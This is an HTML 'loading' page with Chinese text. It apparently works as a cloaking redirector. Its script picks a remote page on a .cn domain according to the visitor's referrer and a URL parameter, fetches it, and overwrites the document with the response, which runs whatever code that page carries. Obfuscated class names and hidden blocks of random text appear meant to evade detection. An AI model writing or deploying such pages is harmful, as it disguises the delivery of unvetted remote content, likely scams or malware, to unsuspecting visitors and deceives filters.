<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .D3WV6kEag {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .D3WV6kEag .rv75SH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .D3WV6kEag .content {
            line-height: 50px;
            text-align: center
        }

        .D3WV6kEag .img {
            width: 100%
        }

        .D3WV6kEag .OUTFW0 {
            text-align: center
        }

        .D3WV6kEag .OUTFW0 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .D3WV6kEag .OUTFW0 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .D3WV6kEag .OUTFW0 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .D3WV6kEag .OUTFW0 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .D3WV6kEag .OUTFW0 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .D3WV6kEag .OUTFW0 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .D3WV6kEag .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UEjEkQajRU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ByClPkw = UEjEkQajRU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ByClPkw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ByClPkw +".html?a=share";
		}
		
        GKqig0f0vP=url+"#"+new Date().getTime();
        GKqig0f0vP && function() {
            $.get(GKqig0f0vP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>MTAAL1t1YqLUIxBcbcHpnR6fW8fCzaXU1LDU5l695EeeZFHPvp9xvuNaXeTpKVr5k64qWAcJofuq5IaesYzbb0MGzlnE6BaWBS</span>
<span style='display:none'>MTAAL1t1YqLUIxBcbcHpnR6fW8fCzaXU1LDU5l695EeeZFHPvp9xvuNaXeTpKVr5k64qWAcJofuq5IaesYzbb0MGzlnE6BaWBS</span>
<ul style='display:none' >NatpvMCR62j9H9TwgHsUo0vZZE17MBsInTvOKEXp</ul>
<b style='display:none' >gtj4x2WTfblZLeoCG</b>
<h1 style='display:none' >VBEZJudjAVLqlCJXQUJz9tKefwNSrNQmYQRI25Ss6OyX5nGBbQ1oGFrj4BRYpR49hzUmEBgM6WajxCgWIizYaO</h1>
<img  src='' style='display:none'>
<ul style='display:none' >NatpvMCR62j9H9TwgHsUo0vZZE17MBsInTvOKEXp</ul><div class="D3WV6kEag">
    <div class="rv75SH">
        <div class="OUTFW0">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>WX0NNukavawY3Pf6wwAMmCFuVpkm1JKPo47Qc14LVnh8TKZU7nLdeHNwuhqOtwHG4YMdttLqrfg5JY4PD8pJgas</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >uIYiKZTQWYWqPtAIznXpYctTpv5bc7DMKLkyaRbojKJDzeVD</h1></body>
</html>